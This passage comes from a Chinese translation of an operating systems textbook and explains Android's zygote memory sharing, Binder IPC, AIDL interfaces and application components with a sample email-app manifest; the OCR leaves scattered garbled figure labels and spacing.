除了 启动 速度 ，zygote 还 带 来 了 另外 一 个 好 处 。 因 为 只 使 用 fork 从 zygote 创 建 进程 ， 所 以 初始 化 
Dalvik 并 且 预 装载 类 和 资源 所 需要 的 大 量 脏 RAM 页 面 可 以 在 zygote 与 它 的 所 有 子 进程 之 间 共 享 。 这 样 的 共 
享 对 于 Android 环 境 尤其 重要 ， 因 为 交换 是 不 可 用 的 ， 而 从 “磁盘 ” (内 存 ) 按 需 分 页 干净 的 页 面 (例如 可 
执行 代码 ) 是 可 用 的 。 然 而 ， 任 何 脏 页 面 必 须 在 RAM 中 保持 锁定 ， 它 们 不 能 分 页 换 出 到 “磁盘 ”上 。 
10.8.7 Binder IPC 

Android 的 系统 设计 特别 围绕 进程 隔离 ， 不 但 在 应 用 程序 之 间 ， 而 且 在 系统 本 身 的 不 同 部 分 之 间隔 
离 进 程 。 这 就 要 求 进行 大 量 的 进程 间 通信 ， 从 而 在 不 同 的 进程 之 间 实 现 协同 ， 这 需要 做 大 量 的 工作 并 得 
到 正确 的 结果 。Android 的 Binder 进 程 间 通 信 机 制 是 一 个 丰富 的 通用 IPC 设 施 ，Android 系 统 的 大 部 分 就 建 
立 在 该 设施 之 上 。 

Binder 体 系 结构 分 为 三 个 层次 ， 如 图 10-42 所 示 。 在 栈 的 最 底层 是 一 个 内 核 模 块 ， 实 现 了 实际 的 跨 


进程 交互 ， 并 且 通 过 内 核 的 ioctl 函 数 将 其 展露 (ioctl 是 一 个 通用 的 内 核 调用 ， 用 来 发 送 定 制 的 命令 给 内 
核 驱 动 程序 和 模块 。) 在 内 核 模块 之 上 ， 是 一 个 
er et rt 
通过 IBinder 和 Binder 类 创建 并 且 与 IPC 端 点 进行 
交互 。 在 顶部 是 一 个 基于 接口 的 编程 模型 ， 应 
用 程序 在 其 中 声明 它们 的 IPC 接 口 ， 并 且 不 再 需 
要 关心 IPC 在 底层 是 如 何 发 生 的 细节 问题 。 

1. Binder 内 核 模块 

Binder 没 有 使 用 像 管道 这 样 的 现 有 Linux 
IPC 设 施 ， 它 包含 一 个 特别 的 内 核 模块 来 实现 其 
自己 的 IPC 制 。Binder IPC 模 型 与 传统 的 Linux 机 
制 差别 之 大 ， 使 得 它 无 法 纯粹 在 用 户 空间 及 
Linux 机 制 之 上 来 实现 。 此 外 ，Android 不 支持 大 
部 分 System V 原 语 (信号 量 、 共 享 内 存 段 、 消 
息 队 列 ) 进行 跨 进 程 的 交互 ， 因 为 它们 不 能 提 
供 健壮 的 语义 以 清除 来 自 有 问题 的 或 恶意 的 应 
用 程序 的 资源 。 

Binder 使 用 的 基本 IPC 模 型 是 远程 过 程 调用 
(Remote Procedure Call，RPC ) 。 也 就 是 说 ， 发 
送 的 进程 向 内 核 提 交 一 个 完整 的 IPC 操 作 ， 该 操 
作 在 接收 的 进程 中 被 执行 ， 当 接收 者 执行 时 ， 
发 送 者 可 能 会 阻塞 ， 使 结果 得 以 从 调用 中 返回 。 国 10-42 Binder PC 体系 结构 
(发 送 者 可 以 有 选择 地 设 定 它们 不 阻塞 ， 从 而 继续 执行 ， 与 接收 者 并 行 。) 因此 ，Binder IPC 是 基于 消息 
的 ， 类 似 System V 消 息 队 列 ， 而 不 是 基于 流 的 (如 Linux 管 道 )。Binder 中 的 消息 称 为 事务 (transaction), 
在 更 高 层 可 以 被 看 作 跨 进程 的 函数 调用 。 

用 户 空间 提交 给 内 核 的 每 个 事务 是 一 个 完整 的 操作 : 它 标 识 操作 的 目标 和 发 送 者 的 标识 符 ， 以 及 交 
付 的 完整 数据 。 内 核 决 定 适当 的 进程 来 接收 该 事务 ， 将 其 交付 给 进程 中 等 待 的 线程 。 

图 10-43 显 示 了 事务 的 基本 流程 。 发 送 的 进程 中 任何 线程 都 可 能 创建 标识 其 目标 的 事务 ， 并 且 将 该 
事务 提交 给 内 核 。 内 核 制作 事务 的 副本 ， 将 发 送 者 的 标识 符 添加 到 其 中 。 内 核 确定 由 哪个 进程 负责 事务 
的 目标 ， 并 且 唤 醒 接收 事务 的 进程 中 的 一 个 线程 。 一 旦 接收 的 进程 执行 起 来 ， 它 要 确定 适当 的 事务 目标 
并 且 交 付 。 
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图 10-43 基本 的 Binder IPC 事 务 
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(为 方便 此 处 的 讨论 ， 我 们 利用 两 个 副本 简化 了 事务 数据 通过 系统 进行 迁移 的 方式 ， 一 个 副本 送 到 
内 核 中 ， 一 个 副本 送 到 接收 进程 的 地 址 空间 中 。 实 际 的 实现 是 以 一 个 副本 来 做 这 件 事 的 。 对 于 可 以 接收 
事务 的 每 一 个 进程 而 言 ， 内 核 为 它 创建 一 个 共享 内 存 区 。 当 处 理 一 个 事务 时 ， 内 核 首 先 确定 将 要 接收 事 
务 的 进程 ， 并 且 直 接 将 数据 复制 到 共享 地 址 空间 中 。) 

注意 图 10-43 中 的 每 个 进程 拥有 一 个 “线程 池 " 。 线 程 池 是 由 用 户 空间 创建 的 一 个 或 多 个 线程 ， 用 以 
处 理 到 来 的 事务 。 内 核 将 每 个 到 来 的 事务 分 派 给 进程 的 线程 池 中 当前 正在 等 待 工作 的 线程 。 然 而 ， 从 发 
送 进程 发 出 的 对 内 核 的 调用 不 必 来 自 线程 地 一 一 该 进程 中 的 任何 线程 都 可 以 自由 地 发 起 一 个 事务 ， 例 如 
图 10-43 中 的 Ta。 

我 们 已 经 看 到 送 给 内 核 的 事务 标识 了 一 个 目标 对 象 (object) ， 然 而 ， 内 核 必须 确定 接收 进程 
(process)。 为 实现 这 一 点 ， 内 核 跟踪 每 个 进程 中 可 用 的 对 象 ， 并 将 它们 映射 到 其 他 进程 ， 如 图 10-44 所 
示 。 我 们 在 这 里 看 到 的 对 象 只 是 该 进程 地 址 空间 中 的 地 址 。 内 核 只 是 跟踪 这 些 对 象 地 址 ， 并 没有 附着 在 
它们 之 上 的 意义 ， 它 们 可 以 是 C 数 据 结构 的 地 址 、C++ 对 象 , 或 者 位 于 该 进程 地 址 空间 中 的 任何 其 他 东西 。 
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图 10-44 Binder 跨 进程 对 象 映射 
远程 进程 中 对 于 对 象 的 引用 由 一 个 整数 句柄 (handle) 来 标识 ， 这 很 像 是 Linux 的 文件 描述 符 。 例 





如 ， 考 虑 进程 ?中 的 对 象 2a 一 一 内 核 知道 它 与 进程 2 相关 联 ， 并 且 内 核 进一步 在 进程 1 中 为 它 分 配 句柄 2。 
因此 ， 进 程 1 可 以 提交 一 个 事务 给 内 核 ， 目 标 为 它 的 句柄 2， 从 中 内 核能 够 确定 这 是 发 给 进程 2 的 ， 并 且 
特别 是 该 进程 中 的 对 象 2a。 

与 文件 描述 符 相似 的 还 有 ， 一 个 进程 中 句柄 的 值 与 其 他 进程 中 的 值 相 同 并 不 意味 着 相同 的 事物 。 例 
如 ， 在 图 10-44 中 ， 我 们 可 以 看 到 在 进程 1 中 ， 句 柄 值 2 标识 对 象 a， 然 而 在 进程 2 中 ， 相 同 的 句柄 值 2 标识 
对 象 la。 此 外 ， 如 果 内 核 没 有 分 配 句柄 给 某 个 进程 ， 那 么 其 他 进程 将 无 法 访问 该 进程 中 的 对 象 。 同 样 在 
图 10-44 中 ， 我 们 可 以 看 到 内 核 知 道 进 程 2 的 对 象 2b， 但 是 对 于 进程 1 没有 为 它 分 配 句柄 。 因 此 ， 对 于 进 
程 1 而 言 ， 不 存在 访问 该 对 象 的 路 径 ， 即 便 内 核 已 经 对 于 其 他 进程 为 它 分 配 了 句柄 。 

然而 ， 从 一 开始 这 些 句 柄 到 对 象 的 关联 是 如 何 得 以 建立 的 ? 与 Linux 文 件 描述 符 不 同 ， 用 户 空间 并 
不 直接 请 求 句 柄 。 相 反 ， 内 核 按 需 分 配 句柄 给 进程 。 这 一 过 程 显示 在 图 10-45 中 。 这 里 我 们 讨论 的 是 前 
一 张 图 中 从 进程 2 到 进程 1 引用 对 象 1b 是 如 何 发 生 的 。 关 键 在 于 在 图 的 底部 从 左 到 右 事务 是 如 何 流 经 系统 
的 。 图 10-45 所 示 的 关键 步骤 是 ， 

1) 进程 1 创建 一 个 初始 的 事务 结构 ， 其 中 包含 对 象 lb 的 本 地 地 址 。 

2) 进程 1 提交 事务 到 内 核 。 

3) 内 核查 看 事务 中 的 数据 ， 找 到 地 址 对 象 lb， 并 且 创 建 一 个 针对 它 的 新 条 目 ， 因 为 它 以 前 并 不 知 
道 该 地 址 。 

4) 内 核 利 用 事务 的 目标 句柄 2 来 确定 它 意 在 进程 2 中 的 对 象 2a。 

5) 内 核 现在 将 事务 头 重 写 ， 使 其 适合 进程 2， 改 变 其 目标 为 地 址 对 象 2a。 

6) 内 核 同 样 为 目标 进程 重 写 事务 数据 ， 此 处 它 发 现 对 象 1b 还 不 被 进程 2 所 知 ， 所 以 为 它 创建 一 个 新 
的 句柄 3 。 
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7) 重 写 的 事务 被 交付 给 进程 2 来 执行 。 
8) 一 旦 接收 到 事务 ， 进 程 会 发 现 新 的 句柄 3， 并 且 将 其 添加 到 可 用 句柄 表 中 。 











图 10-45 在 进程 之 间 传 输 Binder 对 象 


如 果 事 务 内 部 的 一 个 对 象 已 经 由 接收 进程 知晓 ， 则 流程 是 类 似 的 ， 差 别 在 于 现在 内 核 只 需要 重 写 事 
务 ， 使 得 事务 包含 此 前 已 分 配 的 句柄 或 者 接收 进程 的 本 地 对 象 指 针 。 这 意味 着 ， 发 送 相同 的 对 象 到 一 个 
进程 很 多 次 ， 总 是 会 得 到 相同 的 标识 ， 这 与 Linux 文 件 描述 符 不 同 ， 在 Linux 中 打开 相同 的 文件 多 次 ， 每 
次 会 分 配 不 同 的 文件 描述 符 。 当 对 象 在 进程 之 间 传 递 时 ，Binder IPC 系 统 将 维护 唯一 的 对 象 标识 。 

Binder 体 系 结构 本 质 上 为 Linux 引 入 了 一 个 基于 能 力 的 安全 模型 。 每 一 个 Binder 对 象 是 一 个 能 力 。 发 
送 一 个 对 象 到 另 一 个 进程 就 是 将 能 力 授予 该 进程 。 于 是 ， 接 收 进程 可 以 使 用 对 象 提供 的 一 切 功 能 。 进 程 
可 以 送出 一 个 对 象 到 另 一 个 进程 ， 然 后 从 任何 进程 接收 一 个 对 象 ， 并 且 识 别 接 收 到 的 对 象 是 否 正 是 它 最 
初 送出 的 那个 对 象 。 

2. Binder 用 户 空 间 API 

大 多 数 用 户 空间 代码 不 直接 与 Binder 内 核 模块 交互 。 相 反 ， 存 在 一 个 用 户 空间 的 面向 对 象 的 库 ， 它 
提供 了 更 加 简单 的 API。 这 些 用 户 空间 API 的 第 一 层 相 当 直 接地 映射 到 我 们 到 目前 为 止 讨论 过 的 内 核 概 
念 ， 采 用 如 下 三 个 类 的 形式 。 

1) IBinder 是 Binder 对 象 的 抽象 接口 。 其 关键 方法 是 transact， 它 将 一 个 事务 提交 给 对 象 。 接 收 事务 
的 实现 可 能 是 本 地 进程 中 的 一 个 对 象 ， 或 者 是 另 一 个 进程 中 的 对 象 ， 如 果 它 在 另 一 个 进程 中 ， 则 将 会 通 
过 如 前 面 讨论 的 Binder 内 核 模块 交付 给 它 。 

2) Binder 是 一 个 具体 的 Binder 对 象 。 实 现 一 个 Binder 子 类 将 给 你 一 个 可 以 从 其 他 进程 调用 的 类 。 其 
关键 方法 是 onTransact， 它 接收 发 送 给 它 的 一 个 事务 。Binder 子 类 的 主要 责任 是 查看 它 接收 的 事务 数据 ， 
并 且 执 行 适 当 的 操作 。 

3) Parcel ( 包 ) 是 一 个 容器 ， 用 于 读 和 写 Binder 事 务 中 的 数据 。 它 拥有 用 于 读 和 写 类 型 化 数据 ( 整 
数 、 字 符 串 、 数 组 ) 的 方法 ， 但 是 更 加 重要 的 是 它 可 以 读 和 写 对 任何 IBinder 对 象 的 引用 ， 使 用 适当 的 数 
据 结构 供 内 核 跨 进 程 理解 和 传输 该 引用 。 

图 10-46 描 述 了 这 些 类 是 如 何 一 同 工 作 的 ， 这 幅 图 以 用 到 的 用 户 空间 类 修改 了 我 们 在 前 面 看 过 的 
图 10-44。 在 此 处 我 们 看 到 Binderlb 和 Binder2a 是 具体 Binder 子 类 的 实例 。 为 了 执行 一 个 IPC， 进 程 现 在 
要 创建 一 个 包含 期 望 数据 的 Parcel， 并 且 通 过 我 们 还 没有 见 过 的 类 BinderProxy 将 其 发 送 。 只 要 一 个 新 
的 句柄 出 现在 进程 之 中 ， 此 类 就 将 被 创建 ， 因 此 提供 了 IBinder 的 实现 ， 它 的 transact 方 法 将 为 调用 创建 
适当 的 事务 并 将 其 提交 到 内 核 。 

因此 ， 我 们 在 前 面 讨论 过 的 内 核 事务 结构 在 用 户 空间 API 中 拆 开 了 : 目标 由 BinderProxy 代 表 ， 并 且 
其 数据 保存 在 一 个 Parcel 之 中 ， 事务 如 我 们 前 面 看 过 的 那样 流 过 内 核 ， 一旦 出 现在 接收 进程 的 用 户 空 间 
中 ， 它 的 目标 将 用 来 确定 适当 的 接收 Binder 对 象 ， 而 一 个 Parcel 将 从 其 数据 构造 出 来 并 且 交 付 给 对 象 的 
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onTransact 方 法 。 
于 是 这 三 个 类 使 得 编写 IPC 代 码 相当 容易 : 
1) 从 Binder 构 造 子 类 。 
2) 实现 onTransact 以 解码 并 执行 到 来 的 调用 。 
3) 实现 对 应 的 代码 来 创建 Parcel， 它 可 以 发 送 给 对 象 的 transact 方 法 。 


Binder1b 
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图 10-46 Binder 用 户 空间 API 


这 一 工作 的 重头 戏 是 最 后 两 步 ， 也 就 是 解 组 (unmarshalling) 和 编组 (marshalling) 代码 ， 这 些 代 
码 对 于 将 我 们 更 喜欢 编写 的 程序 一 一 使 用 简单 的 方法 调用 一 一 转换 成 执行 IPC 所 需 的 操作 而 言 是 必需 的 。 
这 是 写 起 来 乏味 的 和 容易 出 错 的 代码 ， 所 以 我 们 想 要 计算 机 来 为 我 们 照看 。 

3. Binder 接 口 和 AIDL 

Binder IPC 最 后 的 部 分 是 最 经 常 使 用 的 、 基 于 高 级 接口 的 程序 设计 模型 。 在 这 里 我 们 不 是 和 Binder 
对 象 和 Parcel 数 据 打交道 ， 而 是 按照 接口 和 方法 来 思考 问题 。 

这 一 层 主 要 的 部 分 是 一 个 命令 行 工 具 ， 称 为 AIDL (Android 
Interface Definition Language，Android 接 口 定 义 语言 )。 该 工具 是 
一 个 接口 编译 器 ， 它 以 接口 的 抽象 描述 为 输入 ， 生 成 定义 接口 所 必 interface IExample { 
需 的 源 代码 ， 并 且 实 现 适当 的 编组 和 解 组 代码 ， 这 样 的 代码 是 进行 | Volt Printing mso): 
远程 调用 所 需要 的 。 

图 10-47 显 示 了 用 AIDL 定 义 的 接口 的 简单 例子 。 该 接口 称 为 : 
IExample， 它 包含 单一 的 方法 print， 该 方法 有 单一 的 String 参 数 。 a 

像 是 图 10-47 这 样 的 接口 描述 由 AIDL 进 行 编译 ,生成 三 个 Java 语 言 类 ， 如 图 10-48 所 示 。 

1) IExample 提 供 Java 语 言 接口 定义 。 

2) IExample.Stub 是 实现 该 接口 的 基 类 。 它 继承 自 Binder， 这 意味 着 它 可 以 是 IPC 调 用 的 接收 者 ， 它 
继承 自 IExample， 因 为 这 是 正在 实现 的 接口 。 这 个 类 的 目的 是 执行 解 组 : 将 到 来 的 onTransact 调 用 转换 
成 IExample 的 适当 的 方法 调用 。 它 的 一 个 子 类 只 负责 实现 IExample 方 法 。 

3) IExample.Proxy 是 IPC 调 用 的 另 一 端 ， 负 责 执行 调用 的 编组 。 它 是 IExample 的 一 个 具体 的 实现 ， 
实现 它 的 每 一 个 方法 ， 将 调用 转换 成 适当 的 Parcel 内 容 ， 并 且 通 过 与 之 通信 的 IBinder 上 的 transact 调 用 将 
其 发 送出 去 。 

随 着 这 些 类 的 就 结 ， 就 不 再 需要 担心 IPC 制 。IExample 接 口 的 实现 者 只 是 由 IExample.Stub 导 出 ， 并 
且 按照 常规 实现 了 接口 方法 。 调 用 者 将 接收 一 个 由 IExample.Proxy 实 现 的 IExample 接 口 ， 人 允许 它们 在 接 
口上 发 出 常规 的 调用 。 

这 些 部 分 一 同 工 作 并 实现 一 个 完整 IPC 操 作 的 方式 如 图 10-49 所 示 。 在 IExample 接 口上 的 简单 的 print 
调用 转换 为 : 


package com.example 
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1) 将 方法 调用 编组 成 一 个 Parcel， 调 用 底层 BinderProxy 上 的 transact。 

2) BinderProxy 构 造 一 个 内 核 事 务 并 且 通 过 ioctl 调 用 将 其 交付 给 内 核 。 

3) 内 核 将 事务 传递 给 意 中 的 进程 ， 将 其 交付 给 一 个 正在 其 自己 的 ioctl 调 用 中 等 待 的 线程 。 

4) 事务 解码 回 到 一 个 Parcel， 并 且 在 适当 的 本 地 对 象 上 调用 onTransact， 在 这 里 本 地 对 象 是 


ExampleImpl ( 它 是 IExample.Stub 的 一 个 子 类 )。 


5) IExample.Stub 将 Parcel 解 码 成 适当 的 方法 和 参数 以 便 进行 调用 ， 这 里 调用 的 是 print。 


6) ExampleImpl 中 print 的 具体 实现 最 终 会 执行 。 


IExample.Stub 









IExample.Proxy 


pegi 


图 10-48 Binder 接 口 继承 层次 结构 
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------------------, 


Exampleimpl 


IExample 
print("hello") 
IExample.Stub 


onTransact({print hello}) 





110-49 基于 AIDL 的 Binder IPC 的 完整 路 径 


Android 的 IPC 的 主体 就 是 使 用 这 一 机 制 编写 的 。 
Android 中 的 大 多 数 服务 通过 AIDL 定 义 ， 并 且 用 我 们 这 
里 讨论 的 方式 来 实现 。 回 顾 前 面 图 10-40 中 系统 服务 器 
(system server) 进程 中 的 包 管 理 器 (package manager), 
它 的 实现 使 用 IPC 将 其 自己 发 布 给 服务 管理 器 (service 
manager), ， 从 而 使 其 他 进程 得 以 发 出 对 它 的 调用 。 此 
处 涉及 两 个 AIDL 接 口 : 一 个 是 针对 服务 管理 器 的 ， 一 
个 是 针对 包 管 理 器 的 。 例 如 ， 图 10-50 显 示 了 针对 服务 


package android.os 


interface IServiceManager { 


IBinder getService(String name); 
void addService(String name, |Binder binder); 


} 





图 10-50 基本 的 服务 管理 器 AIDL 接 口 


管理 器 的 基本 AIDL 描 述 ， 它 包含 getService 方 法 ， 其 他 进程 可 以 使 用 该 方法 获得 系统 服务 接口 (如 包 管 


理 器 ) 的 IBinder。 
10.8.8 Android 应 用 


Andriod 提供 的 应 用 模型 与 Linux 脚 本 下 的 普通 命令 


行 环境 以 及 从 图 形 用 户 界 面 启动 的 应 用 程序 有 


很 大 的 不 同 。 应 用 程序 不 再 是 一 个 具有 主 入 口 的 可 执行 文件 ， 而 是 一 个 包含 了 构成 应 用 程序 的 所 有 元 素 
的 容器 : 程序 的 代码 ， 图 形 资源 ， 对 系统 的 声明 ， 以 及 其 他 数据 。 
按照 约定 ，Andriod 应 用 程序 是 一 个 以 apk 为 扩展 名 的 文件 ， 称 为 Android 包 (Android Package), 
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这 个 文件 实际 上 是 一 个 普通 的 zip 压 缩 文 件 ， 包 含 了 与 应 用 程序 相关 的 所 有 内 容 。apk 文 件 中 的 重要 文件 
内 容 包 括 : 

1) 一 个 描述 应 用 程序 是 什么 、 做 什么 以 及 如 何 运行 的 清单 。 清 单 必 须 为 应 用 程序 提供 一 个 包 名 称 ， 
即 一 个 Java 类 型 的 作用 域 字 符 串 (例如 com.android.app.calculator)， 以 便 唯一 地 标识 这 个 应 用 程序 。 

2) 应 用 程序 所 需要 的 资源 ， 包 括 显 示 给 用 户 的 字符 串 ， 与 布局 等 描述 相关 的 XML 数 据 ， 图 形 位 图 ， 
等 等 。 

3) 代码 本 身 ， 这 可 能 是 Dalvik 字 节 码 以 及 本 地 库 代 码 。 

4) 签名 信息 ， 以 安全 地 标识 作者 。 

在 此 ， 我 们 关注 的 主要 内 容 是 应 用 程序 的 清单 ， 即 在 apk 压 缩 文 件 的 命名 空间 的 根 目 录 中 显示 为 
AndroidManifest.xml 的 预 编译 XML 文件 。 图 10-51 显 示 了 一 个 假设 的 电子 邮件 应 用 程序 (app) 的 完整 的 
清单 声明 的 示例 。 它 允许 查看 和 撰写 电子 邮件 ， 还 包括 了 将 本 地 存储 的 电子 邮件 与 服务 器 同步 所 需 的 组 
件 (即便 用 户 当前 不 在 使 用 应 用 程序 )。 

当 用 户 启动 的 时 候 ，Android 应 用 系统 没有 一 个 简单 的 执行 主 入 口 。 相 反 ， 在 清单 的 <application> 
标签 下 会 发 布 应 用 程序 可 以 完成 的 各 种 事件 的 相应 入 口 。 这 些 入 口 被 分 为 四 种 不 同 的 类 型 ， 它 们 定义 了 
应 用 程序 可 以 提供 的 核心 行为 类 型 活动、 接收 器 、 服 务 和 内 容 提供 器 。 我 们 给 出 的 这 个 示例 中 显示 了 
一 些 活动 和 其 他 组 件 类 型 的 一 个 声明 ， 但 是 一 个 应 用 程序 可 能 没有 或 者 同时 有 多 个 这 样 的 声明 。 

应 用 程序 可 包含 的 四 种 不 同 的 组 件 类 型 ， 在 系统 中 代表 着 不 同 的 语义 和 用 途 。 在 所 有 情况 下 ， 都 是 
以 andriod:name 属 性 提供 实现 该 组 件 的 应 用 程序 代码 的 Java 类 名 ， 它 将 由 系统 在 需要 的 时 候 实例 化 。 


<?xml version="1.0" encoding="utf-8"?> 
<manifest xmins:android="http://schemas.android.com/apk/res/android" 
package="com.example.email"> 
<application> 


<activity android:name="com.example.email.MailMainActivity"> 
<intent-filter> 
<action android:name="android.intent.action. MAIN" /> 
<category android:name="android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 


<activity android:name="com.example.email.ComposeActivity"> 
<intent-filter> 
<action android:name="android.intent.action. SEND" /> 
<category android:name="android.intent.category.DEFAULT" /> 
<data android:mimeType="*/*" /> 
</intent-filter> 
</activity> 


<service android:name="com.example.email.SyncService"> 
</service> 


<receiver android:name="com.example.email.SyncControlReceiver'> 
<intent-filter> 
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" /> 
</intent-filter> 
<intent-filter> 
<action android:name="android.intent.action.DEVICE_STORAGE_OKAY" /> 
</intent-filter> 
</receiver> 


<provider android:name="com.example.email.EmailProvider" 
» android:authorities="com.example.email.provider.email"> 
</provider> 


</application> 
</manifest> 








图 10-51 AndroidManifest.xml 的 基本 结构 
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包 管 理 器 (package manager) 是 Andriod 中 用 于 跟踪 所 有 的 应 用 程序 包 的 部 件 。 它 解析 每 个 应 用 程 
序 的 清单 ， 收 集 和 索引 清单 中 的 信息 。 利 用 这 些 信 息 ， 可 以 方便 用 户 查 询 当 前 安装 的 应 用 程序 ， 并 检索 
与 这 些 应 用 相关 的 信息 。 它 还 负责 程序 的 安装 (为 应 用 程序 创建 存储 空间 并 确保 apk 的 完整 性 ) ， 以 及 程 
FRAN (清理 与 以 前 安装 的 应 用 程序 相关 的 所 有 内 容 ) 。 

应 用 程序 在 清单 中 静态 地 声明 它们 的 入 口 , 因此 它们 在 安装 过 程 中 向 系统 注册 时 并 不 需要 执行 代码 。 
这 种 设计 使 得 系统 在 许多 方面 更 加 健壮 : 安装 应 用 程序 时 不 需要 执行 任何 程序 代码 ， 通 过 查看 清单 即 可 
确定 应 用 程序 的 顶层 功能 ， 不 需要 保留 关于 应 用 程序 的 功能 信息 的 独立 数据 库 (独立 的 数据 库 可 能 与 应 
用 程序 的 实际 功能 失去 同步 (例如 跨 更 新 ) ， 并 且 可 保证 在 印 载 后 不 会 有 与 应 用 程序 相关 的 信息 留 下 ) 。 
这 种 去 中 心 化 的 方法 可 以 避免 Windows 的 中 心 化 注册 表 所 导致 的 这 类 问题 。 

将 应 用 程序 分 解 为 更 细 粒 度 的 组 件 也 有 助 于 实现 支持 应 用 程序 之 间 互 操作 和 协作 的 设计 目标 。 应 用 
程序 可 以 按照 片段 的 形式 发 布 特定 的 功能 ， 其 他 应 用 程序 也 可 以 直接 或 者 间接 地 利用 这 些 功 能 。 这 一 点 
将 在 我 们 即将 详细 介绍 的 四 种 可 发 布 的 组 件 中 说 明 。 

在 包 管 理 器 之 上 的 是 另 一 个 重要 的 系统 服务 一 一 活动 管理 器 (activity manager) 。 包 管理 器 负责 维 
护 所 有 已 安装 的 应 用 程序 的 静态 信息 ， 而 活动 管理 器 决定 这 些 应 用 程序 应 该 何 时 、 何 处 和 如 何 运行 。 除 
了 它 的 字面 意义 ， 它 实际 上 负责 运行 四 种 类 型 的 应 用 程序 组 件 ， 并 实现 每 种 组 件 相 应 的 行为 。 

1. 活动 

活动 (activity) 是 应 用 程序 通过 用 户 界面 与 用 户 直接 交互 的 部 分 。 当 用 户 在 其 设备 上 启动 应 用 程 
序 时 ， 实 际 上 应 用 程序 中 的 一 个 活动 已 被 指定 为 主 入 口 。 应 用 程序 执行 了 这 个 活动 中 负责 与 用 户 交 互 
的 代码 。 

图 10-51 所 示 的 电子 邮件 清单 示例 包含 两 个 活动 。 第 一 个 是 主 邮 件 用 户 界面 ， 使 得 用 户 可 以 查看 他 
们 的 邮件 ， 第 二 个 是 用 于 编写 新 消息 的 独立 界面 。 第 一 个 邮件 活动 被 声明 为 应 用 程序 的 主 入 口 ， 也 就 是 
说 ， 它 是 用 户 从 主屏 幕 启动 应 用 程序 时 将 会 开启 的 活动 。 

由 于 第 一 个 活动 是 主 活动 ， 因 此 它 将 在 应 用 程序 从 主 启动 器 启动 的 时 候 展 示 给 用 户 。 如 果 用 户 将 其 
启动 ， 系 统 将 会 处 于 图 10-52 所 示 的 状态 。 这 里 的 活动 管理 器 (图 中 左边 部 分 ) 在 其 进程 中 创建 了 一 个 
内 部 ActivityRecord 实 例 来 跟踪 活动 。 一 个 或 者 多 个 这 样 的 活动 被 组 织 到 任务 (task) 容器 中 ， 它 大 致 对 
应 于 用 户 的 应 用 过 程 。 此 时 ， 活 动 管理 器 启动 了 电子 邮件 应 用 程序 的 进程 及 其 MainMailActivity 实 例 以 
便 显 示 其 主 UI， 这 个 实例 与 其 相应 的 ActivityRecord 关 联 。 这 个 活动 处 于 被 恢复 (resumed) 的 状态 ， 因 
为 它 现在 位 于 用 户 界面 的 前 台 。 
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图 10-52 开启 电子 邮件 应 用 程序 的 主 活动 


如 果 用 户 现在 离开 电子 邮件 应 用 程序 (不 退出 )， 并 启动 相机 应 用 程序 来 拍摄 照片 ， 那 么 我 们 将 处 
于 图 10-53 所 示 的 状态 。 注 意 ， 我 们 现在 有 一 个 新 的 相机 进程 来 运行 相机 的 主 活动 ， 即 活动 管理 器 中 一 
个 与 之 相关 的 ActivityRecord， 而 且 它 现在 是 恢复 的 活动 。 之 前 的 电子 邮件 活动 也 发 生 了 一 些 有 趣 的 事 
情 : 它 现 在 不 是 被 恢复 而 是 被 停止 了 ， ActivityRecord 维 护 着 这 个 活动 的 保存 状态 。 

当 一 个 活动 不 再 位 于 前 台 时 ， 系 统 会 要 求 它 保存 当前 的 状态 。 这 涉及 应 用 程序 创建 代表 用 户 当前 所 
看 内 容 的 少量 状态 信息 ， 然 后 将 这 个 状态 信息 返回 给 活动 管理 器 并 存储 在 system_server 进 程 中 。 活 动 的 
保存 状态 通常 是 很 小 的 ， 包 含 你 在 电子 邮件 中 滚动 的 位 置 之 类 的 信息 ， 而 不 是 消息 本 身 ， 消 息 本 身 由 应 
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用 程序 存储 在 其 永久 存储 器 中 另外 的 位 置 。 
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图 10-53 在 电子 邮件 之 后 开启 相机 应 用 程序 


回想 一 下 ， 尽 管 Andriod 也 需要 分 页 ( 它 可 以 分 页 进出 已 经 被 磁盘 上 的 文件 (如 代码 ) 映射 过 的 未 
用 的 RAM)， 但 它 并 不 依靠 交换 内 存 空间 。 这 意味 着 应 用 程序 进程 中 所 有 已 被 使 用 的 RAM 页 面 必须 保留 
在 RAM 中 。 sa i a a a 为 系统 在 处 理 交 换 来 的 内 存 时 提供 
了 一 定 的 灵活 性 。 

例如 ， 如 果 相 机 应 用 程序 开始 需要 大 量 的 RAM， 系 统 可 以 简单 地 移 除 电子 邮件 的 进程 ， 如 图 10-54 
所 示 。ActivityRecord 及 其 之 前 存储 的 状态 ， 依 然 被 system_server 进 程 中 的 活动 管理 器 安全 地 保存 着 。 由 
于 system_server 进 程 托管 了 所 有 的 Andriod 核 心 系统 服务 ， 它 必须 始终 保存 运行 ， 因 此 保存 在 这 里 的 状 
态 将 根据 我 们 的 需要 一 直 保 留 着 。 
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图 10-54 移 除 电子 邮件 进程 以 便 为 相机 进程 申请 内 存 


我 们 示例 的 电子 邮件 应 用 程序 不 仅 有 一 个 主 UI 活 动 ， 还 包括 了 另 一 个 ComposeActivity。 应 用 程序 
可 以 申明 它 需 要 的 任意 数量 的 活动 。 这 可 以 帮助 组 织 应 用 程序 的 实现 ， 更 重要 的 是 它 可 以 用 于 实现 跨 应 
用 的 交互 。 例 如 ，ComposeActivity 的 参与 是 Android 的 跨 应 用 分 享 系 统 的 基础 。 当 用 户 在 使 用 相机 应 用 
程序 时 想 分 享 她 拍摄 的 一 张 照片 ， 而 我 们 的 电子 邮件 应 用 程序 的 ComposeActivity 正 是 她 的 一 个 分 享 选项 
之 一 。 当 这 个 选项 选中 时 ， 相应 的 活动 将 被 启动 并 分 享 照片 ( 稍 后 我 们 将 看 到 相机 应 用 程序 是 如 何 找到 
电子 邮件 应 用 程序 的 ComposeActivity 的 ) 。 
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在 图 10-54 的 活动 状态 下 执行 该 分 享 选 项 ， 将 会 进入 图 10-55 所 示 的 新 状态 。 有 一 些 重要 的 事件 需要 注意 : 

1) 电子 邮件 应 用 程序 的 进程 必须 重启 ， 以 运行 其 ComposeActivity 。 

2) 但 是 ， 旧 的 MailMainActivity 在 此 时 并 不 启动 ， 因 为 并 不 需要 它 。 这 可 以 减少 RAM 的 使 用 。 

3) 相机 的 任务 中 现在 有 两 项 记录 : 我 们 刚才 所 在 的 原始 CameraMainActivity， 以 及 现在 显示 的 新 
